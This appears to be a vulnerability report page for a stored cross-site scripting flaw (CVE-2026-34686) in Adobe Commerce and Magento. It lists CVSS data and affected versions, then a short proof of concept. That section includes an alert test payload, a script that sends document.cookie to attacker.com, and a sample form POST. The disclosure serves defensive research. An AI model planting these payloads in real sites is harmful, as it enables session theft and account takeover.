Security Vulnerability Report
CVE-2026-34686 CVSS 8.7 HIGH

Published: 2026-05-12 20:16:39
Last Modified: 2026-05-13 18:37:09

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE
Adobe Commerce <= 2.4.9-beta1
Adobe Commerce <= 2.4.8-p4
Adobe Commerce <= 2.4.7-p9
Adobe Commerce <= 2.4.6-p14
Adobe Commerce <= 2.4.5-p16
Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for Adobe Commerce Stored XSS (CVE-2026-34686)
// Attacker injects this payload into a vulnerable form field (e.g., Product Name or User Profile)

// Simple payload to test execution
var payload = '<img src=x onerror=alert(1)>';

// Advanced payload to steal cookies (demonstration purposes only)
var stealPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

// Example HTTP Request simulation
/*
POST /admin/customer/save HTTP/1.1
Host: target-adobe-commerce.com
Content-Type: application/x-www-form-urlencoded

firstname=John&lastname=Doe&[email protected]&custom_field=' + encodeURIComponent(payload) + '
*/

References

Raw JSON Data
